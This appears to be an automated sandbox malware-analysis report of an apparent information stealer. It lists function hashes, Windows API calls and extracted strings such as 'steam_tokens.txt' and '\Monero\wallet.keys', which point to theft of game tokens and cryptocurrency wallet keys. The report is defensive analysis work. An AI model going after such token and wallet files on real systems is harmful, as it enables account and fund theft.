Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: V
API String ID: 544645111-1342839628
Opcode ID: bf027378d83a5e2b2a336afd1e1ccee53b6d80599221a482a9734430697de8bd
Instruction ID: 18bf3b2bb04df73833393ce0c1bb73a5b00d990473a36163092aa70e21044bf3
Opcode Fuzzy Hash: bf027378d83a5e2b2a336afd1e1ccee53b6d80599221a482a9734430697de8bd
Instruction Fuzzy Hash: 5141F37220C20B9FE7059E1CC981FBEB7E5EF84314F25442DE6C287A40D6359C459B6B

Function 00926D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d81af501a69219496e0f63e4ebeb0af91d0f4cb858696bbe83575fcaa40a7842
Instruction ID: 1921ac5a9b0c1403012c39965d91ca42c3b7373f269305935de8998e45b71f0b
Opcode Fuzzy Hash: d81af501a69219496e0f63e4ebeb0af91d0f4cb858696bbe83575fcaa40a7842
Instruction Fuzzy Hash: F46117B4D00228DFCF14DF94E984BEEB7B4BB44304F108598E41967684D775AE94DF91

Function 009370D0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0093718C

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 3722407311-4138519520
Opcode ID: 5b643e459d51e2b9e4898c7a5576640e52a1efbf0f868fe50c51a6afe91526fd
Instruction ID: b6e9378e6b1dbef1508d592a0355fbb1a86d55466247c49de7bd9266147ec414
Opcode Fuzzy Hash: 5b643e459d51e2b9e4898c7a5576640e52a1efbf0f868fe50c51a6afe91526fd
Instruction Fuzzy Hash: 25515CF1D04219ABDB24EBE0DC91BEEF374AF94304F1041A8E215B6181EB746E88DF59

Function 00935100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 0093A820: lstrlen.KERNEL32(00924F05,?,?,00924F05,00940DDE), ref: 0093A82B
Part of subcall function 0093A820: lstrcpy.KERNEL32(00940DDE,00000000), ref: 0093A885

lstrlen.KERNEL32(00000000,00000000,00940ACA), ref: 0093512A

Strings

steam_tokens.txt, xrefs: 0093513F

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 08d42c30e16a23abfd31db98edc2c806925c5cb4fba1c6af5d50bc108e400edc
Instruction ID: ce13a148c0a1d2dc56e7151ed4670c3b518df3336843198803a69ee37027eb9e
Opcode Fuzzy Hash: 08d42c30e16a23abfd31db98edc2c806925c5cb4fba1c6af5d50bc108e400edc
Instruction Fuzzy Hash: 9EF0CD72D1010866DB14F7B0EC57FED773C9FD4300F404168B497A2492EF346A19DAA6

Function 00937ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00940E2C), ref: 00937F00
wsprintfA.USER32 ref: 00937F16

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: fb988ab5bea5414b725c881ebfd26d0e45c1396ec44a98b4f0cc994f865f98f0
Instruction ID: fcbae9fa8278ff2024fbcae2dec5f39a3dd01696746df38c3844f030091d9791
Opcode Fuzzy Hash: fb988ab5bea5414b725c881ebfd26d0e45c1396ec44a98b4f0cc994f865f98f0
Instruction Fuzzy Hash: C1F096B1A04208EBCB10CF85DC45FAAF7BCF744714F000669F515A3680D7B969048FD1

Function 0092B4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6

lstrlen.KERNEL32(00000000), ref: 0092B9C2
lstrlen.KERNEL32(00000000), ref: 0092B9D6

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 0b770949dce7e5f0b0561b4fcaa70000772fada273575e1fe87fe8b0d6e3f4f2
Instruction ID: 0fb780afacf68fd3ed0677fa8c41e587f090f6dffb1f5713e1a47abce8f371ae
Opcode Fuzzy Hash: 0b770949dce7e5f0b0561b4fcaa70000772fada273575e1fe87fe8b0d6e3f4f2
Instruction Fuzzy Hash: DFE1DF72910118ABDF19FBA0DC92FEE7378AF94300F404159F546B60A1EF746A49CFA6

Function 0092AEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

lstrlen.KERNEL32(00000000), ref: 0092B16A
lstrlen.KERNEL32(00000000), ref: 0092B17E

Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 3e938e32b045313cf6193255e0bb8590bf69daa23c13a22c744936773c7404d5
Instruction ID: 1633b0d4b928bec6cb99f0ffb0a3faedb023e391d9ef5f8b1e6f467234c3dea4
Opcode Fuzzy Hash: 3e938e32b045313cf6193255e0bb8590bf69daa23c13a22c744936773c7404d5
Instruction Fuzzy Hash: 3A91E972910118ABDF04EBA0DC96FEE7378AF94300F404169F546B71A1EF746A49CFA6

Function 0092B230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

lstrlen.KERNEL32(00000000), ref: 0092B42E
lstrlen.KERNEL32(00000000), ref: 0092B442

Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 9397875ad12e398a80edd119b3bfca16a3869854426a184dce2407bc88f82771
Instruction ID: db1f473f2d708d9595d2dd264e180f550e7eedddd50d54a20dd935bb14e49693
Opcode Fuzzy Hash: 9397875ad12e398a80edd119b3bfca16a3869854426a184dce2407bc88f82771
Instruction Fuzzy Hash: 9E71ED72910118AADF04FBA0DD96FEE7379AF94300F404528F546A7191EF746A09CFA6

Function 00926660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

